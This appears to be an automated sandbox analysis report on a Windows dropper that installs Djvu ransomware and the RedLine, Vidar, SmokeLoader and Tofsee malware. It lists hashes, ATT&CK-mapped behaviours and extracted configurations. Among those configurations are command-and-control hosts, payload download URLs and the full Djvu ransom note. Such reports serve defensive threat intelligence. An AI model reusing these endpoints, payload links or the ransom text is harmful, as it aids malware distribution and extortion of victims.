djvu | afac7896cf21983233c533eeaec870610856969d98218b0ffdfa11c6f57a8420

Analysis

max time kernel
99s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
07-05-2022 16:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AFAC7896CF21983233C533EEAEC870610856969D98218.exe
Size

3.0MB
MD5

36146d75061dacd10ecfaaef0d2c4c3b
SHA1

f6141869a9b47a102af844a1d27c75b5b19821fa
SHA256

afac7896cf21983233c533eeaec870610856969d98218b0ffdfa11c6f57a8420
SHA512

1c8c967522a0bd748f671908ca3d2c60da5ea1a6e4b7886eaaf841e32f2eb3d4c51749874562a4faad809285ecf8b852d73358847a3a4b31239f9304f6a9f062

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

https://sslamlssa1.tumblr.com/

Attributes

profile_id
933

Extracted

Family

smokeloader

Version

2020

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://monsutiur4.com/

http://nusurionuy5ff.at/

http://moroitomo4.net/

http://susuerulianita1.net/

http://cucumbetuturel4.com/

http://nunuslushau.com/

http://linislominyt11.at/

http://luxulixionus.net/

http://lilisjjoer44.com/

http://nikogminut88.at/

http://limo00ruling.org/

http://mini55tunul.com/

http://samnutu11nuli.com/

http://nikogkojam.org/

rc4.i32

Extracted

Family

redline

Botnet

ink

31.41.244.92:6188

Attributes

auth_value
252ea31a529ee9e2b00f3197b74a845b

Extracted

Family

redline

Botnet

@humus228p

185.215.113.24:15994

Attributes

auth_value
bb99a32fdff98741feb69d524760afae

Extracted

Family

redline

Botnet

SUSHI

65.108.101.231:14648

Attributes

auth_value
26bcdf6ae8358a98f24ebd4bd8ec3714

Extracted

Family

tofsee

niflheimr.cn

jotunheim.name

Extracted

Family

vidar

Version

Botnet

937

https://t.me/hollandracing

https://busshi.moe/@ronxik321

Attributes

profile_id
937

Extracted

Family

redline

Botnet

nam222

103.133.111.182:44839

Attributes

auth_value
487c9546d43348e4d548c29af554c649

Extracted

Family

djvu

http://ugll.org/test3/get.php

Attributes

extension
.xcvf
offline_id
QcVY9rkapJoL3nQkZAsvfTFVYLmscrM1v1QxGWt1
payload_url
http://zerit.top/dl/build2.exe
http://ugll.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-6Ti2DxXR3I Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@time2mail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0472JIjdm

rsa_pubkey.plain

Signatures

Detected Djvu ransomware 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4752-354-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4752-358-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4752-352-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2256 2500 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2256	2500	rUNdlL32.eXe

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3536-264-0x00000000006A0000-0x00000000008C2000-memory.dmp	family_redline
behavioral2/memory/3536-261-0x00000000006A0000-0x00000000008C2000-memory.dmp	family_redline
behavioral2/memory/3536-273-0x00000000006A0000-0x00000000008C2000-memory.dmp	family_redline
behavioral2/memory/1304-271-0x00000000002A0000-0x00000000002C0000-memory.dmp	family_redline
behavioral2/memory/3892-282-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/808-288-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4424-313-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata
Looks for VirtualBox Guest Additions in registry 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 4 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/1304-204-0x0000000000B80000-0x0000000000C1D000-memory.dmp	family_vidar
behavioral2/memory/1304-205-0x0000000000400000-0x00000000008F2000-memory.dmp	family_vidar
behavioral2/memory/4460-339-0x0000000000400000-0x000000000049F000-memory.dmp	family_vidar
behavioral2/memory/4460-338-0x0000000000640000-0x000000000068D000-memory.dmp	family_vidar

ASPack v2.12-2.42 8 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libcurl.dll	aspack_v212_v242

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 33 IoCs

Processes:

setup_install.exesahiba_4.exesahiba_3.exesahiba_5.exesahiba_2.exesahiba_1.exesahiba_6.exesahiba_1.exejfiag3g_gg.exejfiag3g_gg.exe2BbmQg3vtgW5nZdtqUgLHfLN.exehiN1Qx6G2shlTcry35ObGDO3.exeiTa9hKm0uz7Ivxm2ZOzzmtTj.exezagLnKPzWwbFXiwQCmanc0V9.exeIksFZb08Nr0qLP1Tg9CokaU9.exeZSQc_MbWJUJFwqoc60AYk06Y.exev63mcrqbfFruND87PdmhX51t.exeXqHSVFKJIBIStVct51RCTtVb.exeTbtxkihR3hUopY7SDqE82ZrS.exe8ujUxjDTl94qgFS2KPlXfctO.exe_rAGPKC8l7xcC3gHaQXyyycK.exeMucsmtqnmil3tKKHXTTv8yci.exe8SE_UZcBogXB6tvmCL_Z5rQ7.exe6cHvXbyxiA_ixDpkusezKGvd.exeoj1QXtx8VdnVA9BvYSmdPANB.exeNt2zPvVWdn1NsALQKomEwVHG.exe202U4_7V9GNYtVwAfZBFyjIz.exeGdZUVdMyW3UMthgnth2_k1pT.exeWerFault.exeink.exeyaeblan_v0.7b_windows_64.exeNt2zPvVWdn1NsALQKomEwVHG.exehsnanvvv.exe

pid	process
3508	setup_install.exe
564	sahiba_4.exe
1304	sahiba_3.exe
1556	sahiba_5.exe
1568	sahiba_2.exe
4956	sahiba_1.exe
4884	sahiba_6.exe
3388	sahiba_1.exe
4572	jfiag3g_gg.exe
928	jfiag3g_gg.exe
308	2BbmQg3vtgW5nZdtqUgLHfLN.exe
100	hiN1Qx6G2shlTcry35ObGDO3.exe
1524	iTa9hKm0uz7Ivxm2ZOzzmtTj.exe
32	zagLnKPzWwbFXiwQCmanc0V9.exe
2684	IksFZb08Nr0qLP1Tg9CokaU9.exe
3868	ZSQc_MbWJUJFwqoc60AYk06Y.exe
3472	v63mcrqbfFruND87PdmhX51t.exe
1536	XqHSVFKJIBIStVct51RCTtVb.exe
1232	TbtxkihR3hUopY7SDqE82ZrS.exe
4460	8ujUxjDTl94qgFS2KPlXfctO.exe
3444	_rAGPKC8l7xcC3gHaQXyyycK.exe
4780	Mucsmtqnmil3tKKHXTTv8yci.exe
4560	8SE_UZcBogXB6tvmCL_Z5rQ7.exe
2648	6cHvXbyxiA_ixDpkusezKGvd.exe
4948	oj1QXtx8VdnVA9BvYSmdPANB.exe
2368	Nt2zPvVWdn1NsALQKomEwVHG.exe
4472	202U4_7V9GNYtVwAfZBFyjIz.exe
3536	GdZUVdMyW3UMthgnth2_k1pT.exe
5080	WerFault.exe
1304	ink.exe
1560	yaeblan_v0.7b_windows_64.exe
4424	Nt2zPvVWdn1NsALQKomEwVHG.exe
1956	hsnanvvv.exe

Looks for VMWare Tools registry key 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Nt2zPvVWdn1NsALQKomEwVHG.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Nt2zPvVWdn1NsALQKomEwVHG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Nt2zPvVWdn1NsALQKomEwVHG.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sahiba_5.exe_rAGPKC8l7xcC3gHaQXyyycK.exeAFAC7896CF21983233C533EEAEC870610856969D98218.exesahiba_1.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	sahiba_5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	_rAGPKC8l7xcC3gHaQXyyycK.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	AFAC7896CF21983233C533EEAEC870610856969D98218.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	sahiba_1.exe

Loads dropped DLL 7 IoCs

Processes:

setup_install.exesahiba_2.exerundll32.exe

pid process

3508 setup_install.exe
3508 setup_install.exe
3508 setup_install.exe
3508 setup_install.exe
3508 setup_install.exe
1568 sahiba_2.exe
3908 rundll32.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

4412 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4412	icacls.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

sahiba_6.exeIksFZb08Nr0qLP1Tg9CokaU9.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	sahiba_6.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	IksFZb08Nr0qLP1Tg9CokaU9.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	IksFZb08Nr0qLP1Tg9CokaU9.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

22 ipinfo.io
23 ipinfo.io
27 ip-api.com
208 api.2ip.ua
209 api.2ip.ua
243 api.2ip.ua

flow	ioc
22	ipinfo.io
23	ipinfo.io
27	ip-api.com
208	api.2ip.ua
209	api.2ip.ua
243	api.2ip.ua

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Nt2zPvVWdn1NsALQKomEwVHG.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	Nt2zPvVWdn1NsALQKomEwVHG.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	Nt2zPvVWdn1NsALQKomEwVHG.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

oj1QXtx8VdnVA9BvYSmdPANB.exe202U4_7V9GNYtVwAfZBFyjIz.exeNt2zPvVWdn1NsALQKomEwVHG.exe

description	pid	process	target process
PID 4948 set thread context of 3892	4948	oj1QXtx8VdnVA9BvYSmdPANB.exe	AppLaunch.exe
PID 4472 set thread context of 808	4472	202U4_7V9GNYtVwAfZBFyjIz.exe	AppLaunch.exe
PID 2368 set thread context of 4424	2368	Nt2zPvVWdn1NsALQKomEwVHG.exe	Nt2zPvVWdn1NsALQKomEwVHG.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2816	3908	WerFault.exe	rundll32.exe
1984	1304	WerFault.exe	sahiba_3.exe
3140	100	WerFault.exe	hiN1Qx6G2shlTcry35ObGDO3.exe
4652	100	WerFault.exe	hiN1Qx6G2shlTcry35ObGDO3.exe
4368	100	WerFault.exe	hiN1Qx6G2shlTcry35ObGDO3.exe
3176	3444	WerFault.exe	_rAGPKC8l7xcC3gHaQXyyycK.exe
5080	100	WerFault.exe	hiN1Qx6G2shlTcry35ObGDO3.exe
2784	100	WerFault.exe	hiN1Qx6G2shlTcry35ObGDO3.exe
4824	1956	WerFault.exe	hsnanvvv.exe
4540	100	WerFault.exe	hiN1Qx6G2shlTcry35ObGDO3.exe
1096	100	WerFault.exe	hiN1Qx6G2shlTcry35ObGDO3.exe
968	100	WerFault.exe	hiN1Qx6G2shlTcry35ObGDO3.exe
4116	3472	WerFault.exe	v63mcrqbfFruND87PdmhX51t.exe
4200	1524	WerFault.exe	iTa9hKm0uz7Ivxm2ZOzzmtTj.exe
4940	32	WerFault.exe	zagLnKPzWwbFXiwQCmanc0V9.exe
3136	1536	WerFault.exe	XqHSVFKJIBIStVct51RCTtVb.exe
1944	2648	WerFault.exe	6cHvXbyxiA_ixDpkusezKGvd.exe
4896	1232	WerFault.exe	TbtxkihR3hUopY7SDqE82ZrS.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

sahiba_2.exeMucsmtqnmil3tKKHXTTv8yci.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sahiba_2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mucsmtqnmil3tKKHXTTv8yci.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mucsmtqnmil3tKKHXTTv8yci.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mucsmtqnmil3tKKHXTTv8yci.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sahiba_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sahiba_2.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4116 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

444 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

3076 tasklist.exe
4984 tasklist.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4444 taskkill.exe
3152 taskkill.exe

pid	process
4116	schtasks.exe

pid	process
444	timeout.exe

pid	process
3076	tasklist.exe
4984	tasklist.exe

pid	process
4444	taskkill.exe
3152	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

sahiba_3.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	sahiba_3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	sahiba_3.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

sahiba_2.exejfiag3g_gg.exe

pid	process
1568	sahiba_2.exe
1568	sahiba_2.exe
928	jfiag3g_gg.exe
928	jfiag3g_gg.exe
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156
2156

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2156
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

sahiba_2.exeMucsmtqnmil3tKKHXTTv8yci.exe

pid process

1568 sahiba_2.exe
4780 Mucsmtqnmil3tKKHXTTv8yci.exe

pid	process
2156

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

sahiba_4.exeGdZUVdMyW3UMthgnth2_k1pT.exeNt2zPvVWdn1NsALQKomEwVHG.exeTbtxkihR3hUopY7SDqE82ZrS.exeiTa9hKm0uz7Ivxm2ZOzzmtTj.exeXqHSVFKJIBIStVct51RCTtVb.exe6cHvXbyxiA_ixDpkusezKGvd.exe2BbmQg3vtgW5nZdtqUgLHfLN.exezagLnKPzWwbFXiwQCmanc0V9.exev63mcrqbfFruND87PdmhX51t.exe

description	pid	process
Token: SeDebugPrivilege	564	sahiba_4.exe
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeDebugPrivilege	3536	GdZUVdMyW3UMthgnth2_k1pT.exe
Token: SeDebugPrivilege	2368	Nt2zPvVWdn1NsALQKomEwVHG.exe
Token: SeDebugPrivilege	1232	TbtxkihR3hUopY7SDqE82ZrS.exe
Token: SeDebugPrivilege	1524	iTa9hKm0uz7Ivxm2ZOzzmtTj.exe
Token: SeDebugPrivilege	1536	XqHSVFKJIBIStVct51RCTtVb.exe
Token: SeDebugPrivilege	2648	6cHvXbyxiA_ixDpkusezKGvd.exe
Token: SeDebugPrivilege	308	2BbmQg3vtgW5nZdtqUgLHfLN.exe
Token: SeDebugPrivilege	32	zagLnKPzWwbFXiwQCmanc0V9.exe
Token: SeDebugPrivilege	3472	v63mcrqbfFruND87PdmhX51t.exe
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156
Token: SeShutdownPrivilege	2156
Token: SeCreatePagefilePrivilege	2156

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

AFAC7896CF21983233C533EEAEC870610856969D98218.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exesahiba_1.exesahiba_6.exerUNdlL32.eXesahiba_5.exe

description	pid	process	target process
PID 2368 wrote to memory of 3508	2368	AFAC7896CF21983233C533EEAEC870610856969D98218.exe	setup_install.exe
PID 2368 wrote to memory of 3508	2368	AFAC7896CF21983233C533EEAEC870610856969D98218.exe	setup_install.exe
PID 2368 wrote to memory of 3508	2368	AFAC7896CF21983233C533EEAEC870610856969D98218.exe	setup_install.exe
PID 3508 wrote to memory of 2336	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 2336	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 2336	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 2976	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 2976	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 2976	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 2348	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 2348	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 2348	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 4692	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 4692	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 4692	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 320	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 320	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 320	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 216	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 216	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 216	3508	setup_install.exe	cmd.exe
PID 4692 wrote to memory of 564	4692	cmd.exe	sahiba_4.exe
PID 4692 wrote to memory of 564	4692	cmd.exe	sahiba_4.exe
PID 2348 wrote to memory of 1304	2348	cmd.exe	sahiba_3.exe
PID 2348 wrote to memory of 1304	2348	cmd.exe	sahiba_3.exe
PID 2348 wrote to memory of 1304	2348	cmd.exe	sahiba_3.exe
PID 3508 wrote to memory of 3796	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 3796	3508	setup_install.exe	cmd.exe
PID 3508 wrote to memory of 3796	3508	setup_install.exe	cmd.exe
PID 2976 wrote to memory of 1568	2976	cmd.exe	sahiba_2.exe
PID 2976 wrote to memory of 1568	2976	cmd.exe	sahiba_2.exe
PID 2976 wrote to memory of 1568	2976	cmd.exe	sahiba_2.exe
PID 320 wrote to memory of 1556	320	cmd.exe	sahiba_5.exe
PID 320 wrote to memory of 1556	320	cmd.exe	sahiba_5.exe
PID 320 wrote to memory of 1556	320	cmd.exe	sahiba_5.exe
